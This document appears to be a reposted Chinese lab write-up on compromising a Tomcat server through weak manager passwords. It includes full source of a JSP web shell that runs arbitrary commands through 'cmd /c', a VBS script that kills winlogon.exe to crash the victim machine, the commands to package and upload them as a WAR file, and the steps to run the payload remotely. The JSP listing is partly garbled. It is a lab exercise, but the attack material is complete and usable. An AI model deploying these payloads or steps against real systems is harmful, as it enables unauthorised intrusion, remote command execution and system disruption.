服务器弱口令修改,Tomcat服务器弱口令漏洞攻击实验
1、在XP系統上搭建Tomcat服務器平臺;
2、在另一臺虛擬機上利用弱口令漏洞上傳木馬程序,使得XP系統中木馬。
實驗步驟
一、搭建Tomcat服務器平臺
1.安裝JAVAJDK
環境變量的配置:(這里我的JAVA是按照默認安裝地址安裝的)
JAVA_HOME:C:\Program Files\Java\jdk1.7.0_79
Path:%JAVA_HOME%\bin
CLASSPATH:.%JAVA_HOME%\lib\dt.jar;%JAVA_HOME%\lib\tool.jar
Cmd輸入命令查看
輸入:java –version,檢查是否安裝成功。
1.png (43.07 KB, 下載次數: 0)
2021-4-28 21:07 上傳
輸入:javac,檢查環境變量配置是否成功。
2.png (52.02 KB, 下載次數: 0)
2021-4-28 21:08 上傳
2.安裝Apache-Tomcat服務器
將壓縮包解壓,把整個文件夾拷貝至C盤。(免安裝)
添加環境變量:
TOMCAT_HOME:C:\apache-tomcat-6.0.37
進入bin目錄,點擊startup.bat或者shutdown.bat可以啟動或關閉服務器。
若測試不成功,則需添加完整的環境變量。(可選不是必選)
3.png (95.72 KB, 下載次數: 0)
2021-4-28 21:08 上傳
點擊startup.exe,啟動服務器,在瀏覽器中輸入:http://127.0.0.1:8080/,若顯示如下界面,則服務器啟動成功。
4.png (186.54 KB, 下載次數: 0)
2021-4-28 21:08 上傳
二、登錄管理員后臺
登錄管理員后臺需要用戶名密碼,剛開始未設置,我們要自行設置。
5.png (112.93 KB, 下載次數: 1)
2021-4-28 21:08 上傳
首先查看存放用戶名密碼的文件:在conf文件夾下的tomcat-users.xml,用記事本打開。將管理員賬號添加進去:
其中各個rolename的含義:
6.png (25.94 KB, 下載次數: 1)
2021-4-28 21:08 上傳
點擊保存后重啟服務器,回到登錄界面,輸入用戶名密碼,即可進入管理員界面:
7.png (76.33 KB, 下載次數: 1)
2021-4-28 21:08 上傳
三、木馬制作
Tomcat只支持war的后綴文件包的上傳,因此,必須將jsp木馬程序與其他木馬一起打包成war包才能上傳。
在安裝有JDK的操作系統上,將所需要上傳的木馬放在同一個文件夾中,存放到C盤。
這里用到一個s.jsp的木馬程序以及V.vbs病毒程序。
這里s.jsp的代碼:
[AppleScript] 純文本查看 復制代碼
td,select,input,body
{
font-size:9pt;
}
A { TEXT-DECORATION: none }
Jsp File Manger Version0.5 --bY 慈勤強 [email]cqq1978@Gmail.com[/email]String getDrivers()
/**
Windows系統上取得可用的所有邏輯盤
**/
{
StringBuffer sb=new StringBuffer("驅動器 : ");
File roots[]=File.listRoots();
for(int i=0;i
{
sb.append("");
sb.append(roots[i]+" ");
}
return sb.toString();
}
%>
String strThisFile="folder.jsp";
request.setCharacterEncoding("gb2312");
String strDir = request.getParameter("path");
if(strDir==null||strDir.length()<1)
{
strDir = "c:\\";
}
StringBuffer sb=new StringBuffer("");
StringBuffer sbFile=new StringBuffer("");
try
{
out.println("
| 當前目錄: "+strDir+" | " + getDrivers() + " |
\r\n");
File objFile = new File(strDir);
File list[] = objFile.listFiles();
if(objFile.getAbsolutePath().length()>3)
{
sb.append("
");sb.append("上級目錄
- - - - - - - - - - - \r\n");
}
for(int i=0;i
{
if(list[i].isDirectory())
{
sb.append("
");sb.append(""+list[i].getName()+"");
sb.append("
");//sb.append("\r\n");
}
else
{
String strLen="";
String strDT="";
long lFile=0;
lFile=list[i].length();
if(lFile>1000000)
{
lFile=lFile/1000000;
strLen="" + lFile + " M";
}
else if(lFile>1000)
{
lFile=lFile/1000;
strLen="" + lFile + " K";
}
else
{
strLen="" + lFile + " Byte";
}
Date dt=new Date(list[i].lastModified());
strDT=dt.toLocaleString();
sbFile.append("
");sbFile.append(""+list[i].getName());
sbFile.append("
");sbFile.append(""+strLen);
sbFile.append("
");sbFile.append(""+strDT);
sbFile.append("
");sbFile.append(" ");
sbFile.append("
\r\n");//sbFile.append("");
}
}
//out.println(sb.toString()+sbFile.toString());
}
catch(Exception e)
{
out.println("操作失敗: "+e.toString()+"");
}
%>
|
String strCmd="";
String line="";
StringBuffer sbCmd=new StringBuffer("");
strCmd = request.getParameter("cmd");
if(strCmd!=null)
{
try
{
//out.println(strCmd);
Process p=Runtime.getRuntime().exec("cmd /c "+strCmd);
BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));
while((line=br.readLine())!=null)
{
sbCmd.append(line+"\r\n");
}
}
catch(Exception e)
{
System.out.println(e.toString());
}
}
%>
if(sbCmd!=null && sbCmd.toString().trim().equals("")==false)
{
%>
}
%>
這里V.vbs的代碼:
[AppleScript] 純文本查看 復制代碼if MsgBox("你是在上網絡信息安全的課嗎?",vbYesNo,"提示")=vbyes then
msgbox "你真是在上網絡安全課啊,這么好丫!"
else
msgbox "還不承認? 作為懲罰,折騰你一下",64,"嚴重警告!!!!!!"
Set ws = CreateObject("Wscript.Shell")
wscript.sleep 1200
ws.run "cmd /c start /min ntsd -c q -pn winlogon.exe 1>nul 2>nul",vbhide
end if
運行cmd,使用cd命令將目錄切換到剛剛存放的c文件夾下:
8.png (38.04 KB, 下載次數: 1)
2021-4-28 21:08 上傳
使用命令將木馬程序打包:
jar cvf shell.war *
若提示jar不是內部命令,請回到JDK安裝步驟查看環境變量是否配置正確。
成功時的命令提示如下:
9.png (66.95 KB, 下載次數: 1)
2021-4-28 21:08 上傳
四、漏洞入侵
訪問目標網站
使用另一臺電腦輸入以下網址:
http://192.168.41.131:8080/(對應IP地址要改)
訪問成功將出現以下界面:
10.png (117.38 KB, 下載次數: 0)
2021-4-28 21:08 上傳
弱口令掃描
打開Apache Tomcat crack軟件,界面如下:
11.png (51.57 KB, 下載次數: 0)
2021-4-28 21:08 上傳
設置掃描網段,點擊add按鈕添加;點擊start按鈕開始掃描。掃描成功將獲得口令和密碼。
12.png (86.02 KB, 下載次數: 1)
2021-4-28 21:08 上傳
上傳木馬
利用前面掃描到的口令密碼登錄管理員網頁,將之前做好的war包上傳至服務器:
13.png (33.68 KB, 下載次數: 0)
2021-4-28 21:08 上傳
14.png (13.95 KB, 下載次數: 0)
2021-4-28 21:08 上傳
查看木馬
在地址欄中輸入網址:
http://192.168.41.131:8080/shell/s.jsp
即可看到對方電腦中所有的文件目錄:
15.png (68.21 KB, 下載次數: 0)
2021-4-28 21:08 上傳
運行木馬
找出之前一并上傳的木馬文件V.vbs,利用下面的執行功能讓其在被害者電腦上運行:
c:\apache-tomcat-6.0.37\webapps\shell\V.vbs -install
16.png (69.22 KB, 下載次數: 0)
2021-4-28 21:08 上傳
此時在被攻擊者電腦上會自運行病毒程序,即中病毒了。也可將病毒用灰鴿子木馬替換實現遠程控制。
17.png (34.82 KB, 下載次數: 0)
2021-4-28 21:08 上傳
18.png (35.01 KB, 下載次數: 0)
2021-4-28 21:08 上傳
點擊“否”的話要小心哦,因為電腦會變成“藍屏”,不過不用怕,其實就藍屏一會兒就幫你重啟啦~不相信可以返回去看V.vbs的代碼哦~
總結
以上是生活随笔為你收集整理的服务器弱口令修改,Tomcat服务器弱口令漏洞攻击实验的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 小小军团获取服务器配置文件,小小军团2资
- 下一篇: 激战服务器位置,《激战2》世界之战指南(